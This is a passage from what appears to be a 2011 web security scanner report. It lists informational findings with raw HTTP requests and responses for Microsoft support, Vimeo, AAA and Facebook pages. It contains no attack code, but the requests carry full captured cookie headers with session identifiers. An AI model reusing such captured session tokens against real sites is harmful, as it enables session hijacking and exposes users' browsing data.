Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; wedcsinc=1; ST_GN_EN-US=5_0_0; fmsmemo=st=|13083|13701; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078475316:ss=1311077969178; sdninc=3; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:27:48&Microsoft.NumberOfVisits=1&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:27:48&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=68&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; .ASPXANONYMOUS=h7GYQbp8zAEkAAAAYjRhYTU1M2MtNWZhZC00MTkxLWIwMjYtZjAzYjBjNjFkNWM4kVMZvo9G5bHj7F5QoTXJNIqBvRs1; fmshb=0,1311089278064

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:30:06 GMT
Content-Length: 41188

<html lang="en-US"><head><meta name="DCSext.sup_cid" content="cu_sc_prodact_master" /><meta name="DCSext.sup_cln" content="en-us" /><meta name="DCSext.sup_ct" content="dm" /><meta name="DCSext.sup_ln"
...[SNIP]...
<script type="text/javascript">setcookieval("gssSITE","gn",'',true);</script><script type="text/javascript">setcookieval("gssTHEME","gn",'',true);</script><script type="text/javascript">setcookieval("gssTOOLBAR","gn",'',true);</script><script type="text/javascript" src="/contactus/common/script/contactus.js?43"></script><script type="text/javascript" src="/contactus/common/script/alerts.js?43"></script><meta name="robots" content="" /><meta name="MS.LOCALE" content="en" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="content-language" content="en-US"><script type="text/javascript" src="/library/JavaScript/support/CN/ad.js"></script><script type="text/javascript" src="/common/script/gsfx/search.js?43"></script><script type="text/javascript" src="http://autocomplete.support.microsoft.com/script/ac.js?43"></script><script type="text/javascript">var gCookieDomain='';var url_exactMatch='/select/Default.aspx?target=assistance';</script><title>Help and Support</title><XMLREADER><link rel="stylesheet" type="text/css" href="/common/css/default/default.css?43" /><link rel="stylesheet" type="text/css" href="/contactus/common/css/contactus.css?43" /><link rel="stylesheet" type="text/css" href="/common/css/default/branding.css?43" /></XMLREADER>
<!-- RESG: 7/19/2011 8:30:07 AM - RESX: 1/1/0001 12:00:00 AM -->
<!-- (c) 2011 Microsoft Corporation. All Rights Reserved -->
<script type="text/javascript" src="/common/script/fx/surveycookieutil.js?43"></script></head><body onload="thisLoad();" onunload="thisUnload();">
<style type="text/css">
body
{

background:url('/library/images/support/cn/parent_bkgnd.png') repeat-x #FFFFFF;

}


#gsfx_brnd_PageHeaderImage
{
background:url('/library/images/support/cn/mso_energy.jpg') no-repeat top center;
}


#gsfx_brnd_SiteHeaderImage
{
height:0px;
}



.gsfx_brnd_NetworkLink, .gsfx_brnd_NetworkLink:vi
...[SNIP]...

18.6. http://support.microsoft.com/gp/csa  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://support.microsoft.com
Path:   /gp/csa

Request 1

GET /gp/csa HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
Referer: http://support.microsoft.com/contactus/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; sdninc=6; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; wedcsinc=3; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; .ASPXANONYMOUS=VT3Vw7p8zAEkAAAAMmI2MjhmMGQtZjljMC00ZjVjLWI3NTQtYzI1YjhjYjRkODFmgfpg6oo1Tx6e5ghYq_tHKKDqu1A1; fmshb=0,1311089497349

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=ja--rLt8zAEkAAAAZTAyNTA0MjEtMjQwNi00OTI1LTlhMWEtMzgzZDFkY2JjYmZheOdMAmdUxFJD1z3fbqoo-WMAQwU1; expires=Tue, 27-Sep-2011 02:17:58 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:37:58 GMT
Content-Length: 45396

<html lang="en-US"><head><link title="Microsoft Support Search" type="application/opensearchdescription+xml" rel="search" href="/common/opensearchdescriptor.aspx?ln=en-us" /><meta name="ms.gsfxversion
...[SNIP]...
</script><meta name="robots" content="none" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="content-language" content="en-US"><script type="text/javascript" src="/library/JavaScript/support/CN/ad.js"></script><script type="text/javascript" src="/common/script/gsfx/search.js?43"></script><script type="text/javascript" src="http://autocomplete.support.microsoft.com/script/ac.js?43"></script><script type="text/javascript">var gCookieDomain='';var url_exactMatch='/select/Default.aspx?target=assistance';</script><title>Agreement for Microsoft Services</title><XMLREADER><link rel="stylesheet" type="text/css" href="/common/css/default/default.css?43" /><link rel="stylesheet" type="text/css" href="/common/css/default/branding.css?43" /></XMLREADER>
<!-- RESG: 7/19/2011 8:37:58 AM - RESX: 1/1/0001 12:00:00 AM -->
<!-- (c) 2011 Microsoft Corporation. All Rights Reserved -->
<style type="text/css">html body, html select, html input, html form, html textarea{font-family : Verdana, Arial, Helvetica, Sans-Serif;}</style><script type="text/javascript">var PersonalizationInfo='Z3Blbi11cwhjc2EIQWdyZWVtZW50IGZvciBNaWNyb3NvZnQgU2U_';</script><script type="text/javascript" src="/common/script/fx/surveycookieutil.js?43"></script></head><body onload="thisLoad();" onunload="thisUnload();">
<style type="text/css">
body
{

background:url('/library/images/support/cn/parent_bkgnd.png') repeat-x #FFFFFF;

}


#gsfx_brnd_PageHeaderImage
{
background:url('/library/images/support/cn/mso_energy.jpg') no-repeat top center;
}


#gsfx_brnd_SiteHeaderImage
{
height:0px;
}



.gsfx_brnd_NetworkLink, .gsfx_brnd_NetworkLink:visited, .gsfx_brnd_NetworkLink a, .gsfx_brnd_NetworkLink a:visited
{
color: #FFFFFF;
}

.gsfx_brnd_NetworkLink:hover, .gsfx_brnd_NetworkLink:active, .gsfx_brnd_NetworkLink:focus,
.gsf
...[SNIP]...

Request 2

GET /gp/csa HTTP/1.1
Host: support.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; LBRN2DL=C; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; GsfxSessionCookie=84234519568121313; GsfxStatsLog=true; 21661174-VID=16101514677756; 21661174-SKEY=5504769704751670663; HumanClickSiteContainerID_21661174=STANDALONE; tbcu_sc_prodact_master99838=0; ST_GN_EN-US=6_0_0; fmsmemo=st=|13083|13701|13703; sdninc=6; gssSITE=gn; gssTHEME=gn; gssTOOLBAR=gn; wedcsinc=3; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=567b0273-d70d-46a7-bef2-696009e9ab04&Microsoft.CreationDate=07/19/2011 15:27:48&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.NumberOfVisits=4&SessionCookie.Id=504B3E6C585D1B2E40432E2A6226F21B; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/19/2011 15:28:22&Microsoft.VisitStartDate=07/19/2011 15:27:48&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=71&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; MS0=e2380e0986da4be1b66f0ac9e9764ae5; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311078515827:ss=1311077969178; .ASPXANONYMOUS=VT3Vw7p8zAEkAAAAMmI2MjhmMGQtZjljMC00ZjVjLWI3NTQtYzI1YjhjYjRkODFmgfpg6oo1Tx6e5ghYq_tHKKDqu1A1; fmshb=0,1311089497349

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=kcqX-rt8zAEkAAAAMzgyZTkwNTMtZjFhMS00Y2I4LTg2NWQtZDYyMTg0YmUxYjVl_QNiaPfk2qm0m5GpJNryNe8Bs9M1; expires=Tue, 27-Sep-2011 02:20:09 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B07
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Tue, 19 Jul 2011 15:40:08 GMT
Content-Length: 45631

<html lang="en-US"><head><link title="Microsoft Support Search" type="application/opensearchdescription+xml" rel="search" href="/common/opensearchdescriptor.aspx?ln=en-us" /><meta name="ms.gsfxversion
...[SNIP]...
<script type="text/javascript">setcookieval("gssSITE","gn",'',true);</script><script type="text/javascript">setcookieval("gssTHEME","gn",'',true);</script><script type="text/javascript">setcookieval("gssTOOLBAR","gn",'',true);</script><meta name="robots" content="none" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="content-language" content="en-US"><script type="text/javascript" src="/library/JavaScript/support/CN/ad.js"></script><script type="text/javascript" src="/common/script/gsfx/search.js?43"></script><script type="text/javascript" src="http://autocomplete.support.microsoft.com/script/ac.js?43"></script><script type="text/javascript">var gCookieDomain='';var url_exactMatch='/select/Default.aspx?target=assistance';</script><title>Agreement for Microsoft Services</title><XMLREADER><link rel="stylesheet" type="text/css" href="/common/css/default/default.css?43" /><link rel="stylesheet" type="text/css" href="/common/css/default/branding.css?43" /></XMLREADER>
<!-- RESG: 7/19/2011 8:40:09 AM - RESX: 1/1/0001 12:00:00 AM -->
<!-- (c) 2011 Microsoft Corporation. All Rights Reserved -->
<style type="text/css">html body, html select, html input, html form, html textarea{font-family : Verdana, Arial, Helvetica, Sans-Serif;}</style><script type="text/javascript">var PersonalizationInfo='Z3Blbi11cwhjc2EIQWdyZWVtZW50IGZvciBNaWNyb3NvZnQgU2U_';</script><script type="text/javascript" src="/common/script/fx/surveycookieutil.js?43"></script></head><body onload="thisLoad();" onunload="thisUnload();">
<style type="text/css">
body
{

background:url('/library/images/support/cn/parent_bkgnd.png') repeat-x #FFFFFF;

}


#gsfx_brnd_PageHeaderImage
{
background:url('/library/images/support/cn/mso_energy.jpg') no-repeat top center;
}


#gsfx_brnd_SiteHeaderImage
{
height:0px;
}



.gsfx_brnd_NetworkLink, .gsfx_brn
...[SNIP]...

18.7. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vimeo.com
Path:   /moogaloop.swf

Request 1

GET /moogaloop.swf?clip_id=9957644&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response 1

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.67
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.20/moogaloop.swf._root........<.......<.......<.......<......    ....A.@...

Request 2

GET /moogaloop.swf?clip_id=9957644&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:21 GMT
X-Server: 10.90.128.73
Vary: Accept-Encoding
Content-Length: 245
Connection: close
Content-Type: application/x-shockwave-flash

FWS.....p...........?........
..embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.20/moogaloop.swf._root........<.......<.......<.......<......    ....A.@...

18.8. http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aaa.com
Path:   /scripts/WebObjects.dll/ZipCode.woa/wa/route

Request 1

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route
Cookie: zipcode=05672|AAA|36

Response 1

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:04:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW1
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:22 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:22 GMT; path=/; domain=aaa.com
content-length: 1280

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com">


<TITLE>www.aaa.com redirect</TITLE>
</HEAD>
<BODY>
<BR>
<BR>
<A HREF="http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com">If this page does not refresh click here.</A>
   
   
       <!-- ARSearchLogger START -->

<!-- ARSearchJavaScript START -->

<!-- ARSearchJavaScript END --><!-- ARSearchLogger END -->
   <!-- DCSLogging START -->

   <!-- DCS Logging is ON -->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="/configuration/dcs_tag.js">    
   </SCRIPT>
   <SCRIPT LANGUAGE="JavaScript1.1">
       <!--
               setCategory("ZipCodeRedirect");
   setSubcategory("COOKIE_RD");
   setArea("Home");
   setByClub(36);
   logPage();
       // -->
   </SCRIPT>

<!-- DCSLogging END -->

   <!-- SEMAction START -->


   <!-- SEMActionJavaScript START -->
<script type="text/javascript" src="/configuration/SEM/AAA_ActionTags.js"></script>

<!-- SEMActionJavaScript END -->


<!-- ARSearchLogger END -->

   <SCRIPT>
   <!--
       window.location.replace('http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com');
   // -->
   </SCRIPT>

</BODY>
</HTML>

Request 2

GET /scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx HTTP/1.1
Host: www.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: zipcode=05672|AAA|36

Response 2

HTTP/1.1 200 Apple
Date: Tue, 19 Jul 2011 19:04:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI PUR COM NAV INT DEM STA PRE"
UniqueName: CHIWWW3
X-Powered-By: ASP.NET
content-type: text/html
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:52 GMT; path=/; domain=aaa.com
set-cookie: zipcode=05672|AAA|36; version="1"; expires=Wed, 18-Jul-2012 19:04:52 GMT; path=/; domain=aaa.com
content-length: 1220

<HTML>
<HEAD>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672">


<TITLE>www.aaa.com redirect</TITLE>
</HEAD>
<BODY>
<BR>
<BR>
<A HREF="http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672">If this page does not refresh click here.</A>
   
   
       <!-- ARSearchLogger START -->

<!-- ARSearchJavaScript START -->

<!-- ARSearchJavaScript END --><!-- ARSearchLogger END -->
   <!-- DCSLogging START -->

   <!-- DCS Logging is ON -->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="/configuration/dcs_tag.js">    
   </SCRIPT>
   <SCRIPT LANGUAGE="JavaScript1.1">
       <!--
               setCategory("ZipCodeRedirect");
   setSubcategory("COOKIE_RD");
   setArea("Home");
   setByClub(36);
   logPage();
       // -->
   </SCRIPT>

<!-- DCSLogging END -->

   <!-- SEMAction START -->


   <!-- SEMActionJavaScript START -->
<script type="text/javascript" src="/configuration/SEM/AAA_ActionTags.js"></script>

<!-- SEMActionJavaScript END -->


<!-- ARSearchLogger END -->

   <SCRIPT>
   <!--
       window.location.replace('http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672');
   // -->
   </SCRIPT>

</BODY>
</HTML>

18.9. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Request 1

GET /plugins/activity.php?site=www.boston.com&width=311&height=300&header=false&colorscheme=light&font&border_color=white&ref=homepage HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.147.40
X-Cnection: close
Date: Tue, 19 Jul 2011 20:42:24 GMT
Content-Length: 8776

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="pbsH";</scri
...[SNIP]...
<div id="u814453_1" class="fbConnectWidgetTopmost" style="height:298px; width:309px; border-color:white;"><div style="overflow: hidden;height:275px; "><div class="mhs pvm phs ConnectActivityLogin uiBoxWhite"><form action="/campaign/landing.php" target="_blank" onsubmit="return Event.__inlineSubmit(this,event)"><input name="campaign_id" value="137675572948107" type="hidden" /><input name="partner_id" value="boston.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://boston.com/" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u814453_3"><input value="Sign Up" type="submit" id="u814453_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u814453_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u814453_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"></div><img class="fbLoadImg img" src="http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jKEcVPZFk-2.gif" alt="" width="32" height="32" /></div></div></div><div class="fbConnectWidgetFooter"><div class="fbFooterBorder"><div class="UIImageBlock clearfix"><a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=3" tabindex="-1" aria-hidden="true"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" alt="" width="14" height="14" /></a><div class="UIImageBlock_Content UIImageBlock_ICON_Content"><div class="fss fwn fcg"><span><a class="uiLinkSubtle" tar
